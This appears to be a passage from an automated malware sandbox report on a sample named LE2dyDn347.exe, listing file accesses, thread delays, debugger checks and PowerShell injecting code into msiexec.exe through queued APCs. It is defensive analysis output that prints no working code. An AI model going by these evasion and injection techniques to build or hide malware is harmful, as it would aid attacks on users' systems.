            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95844Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95719Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 94110Jump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\LE2dyDn347.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
            Source: msiexec.exe, 00000009.00000002.2489892391.00000000078D2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2489892391.000000000787A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\LE2dyDn347.exeAPI call chain: ExitProcess graph end nodegraph_0-3752
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0013C168 LdrInitializeThunk,9_2_0013C168
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
